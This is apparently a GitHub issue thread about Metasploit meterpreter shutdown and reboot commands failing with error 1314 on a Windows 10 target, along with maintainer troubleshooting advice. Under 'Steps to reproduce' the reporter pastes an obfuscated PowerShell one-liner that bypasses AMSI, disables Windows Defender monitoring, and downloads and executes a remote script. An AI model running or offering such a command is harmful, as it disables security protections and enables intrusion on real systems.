Closed GetRektBoy724 closed 3 years ago
Please don't link to live payloads, I updated your post to remove the URL.
Looks like error 1314 is ERROR_PRIVILEGE_NOT_HELD
. Did getsystem
succeed? I'm guessing that it failed and that you lack the privileges necessary to perform the operation.
yea,the getsystem
succeds.even with normal user,reboot
and shutdown
works normally
anyone can help me? :')
meh found a wayaround,after getting a administrator meterpreter shell,use getsystem
,after that migrate to other windows process that have NT AUTHORITY/SYSTEM
too,and after that reboot
and shutdown
working normally
A useful solution
If you're running as SYSTEM, the getprivs
command might be able to get the necessary privileges to shutdown/reboot.
Steps to reproduce
How'd you do it?
powershell.exe -nop -ep bypass -NoExit -Command "[Ref].Assembly.GetType('System.Management.Automation.'+$([cHAr]([ByTE]0x41)+[cHAr]([byte]0x6D)+[ChAR](115)+[char]([bYtE]0x69))+'Utils').GetField($([systeM.NET.WEbUtIliTY]::HtMldECoDe('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);;Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableScriptScanning $true;;IEX(New-Object Net.WebClient).DownloadString('https://[redacted]');"
getsystem -t 2
on the meterpreter shellThis section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions. windows 10 v20H2
Were you following a specific guide/tutorial or reading documentation?
nope
Expected behavior
What should happen? i can shutdown and reboot the victim's system
Current behavior
i get
stdapi_sys_power_exitwindows: Operation failed: 1314
forshutdown
andreboot
commandMetasploit version
metasploit v6.0.26-dev